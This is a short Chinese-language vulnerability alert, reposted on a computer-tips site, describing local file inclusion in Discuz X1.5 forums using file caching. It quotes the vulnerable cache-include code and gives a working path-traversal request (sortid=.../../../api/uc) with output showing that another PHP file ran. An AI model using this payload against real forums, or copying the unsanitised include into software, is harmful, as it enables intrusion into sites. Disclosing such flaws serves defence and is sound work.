DISCUZX1.5 本地文件包含漏洞漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存,

DISCUZX1.5 本地文件包含漏洞漏洞预警

    config_global.php

    $_config['cache']['type'] = 'file';

    function cachedata($cachenames) {

    ......

    $isfilecache = getglobal('config/cache/type') == 'file';

    ......

    if($isfilecache) {

    $lostcaches = array();

    foreach($cachenames as $cachename) {

    if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {

    $lostcaches[] = $cachename;

    }

    }

    ......

    }

    地址:

    http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

    http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

    Authracation has expiried

    执行了 api/uc.php 页面代码了,

电脑资料

DISCUZX1.5 本地文件包含漏洞漏洞预警》(https://www.unjs.com)。

    作者: Jannock

最新文章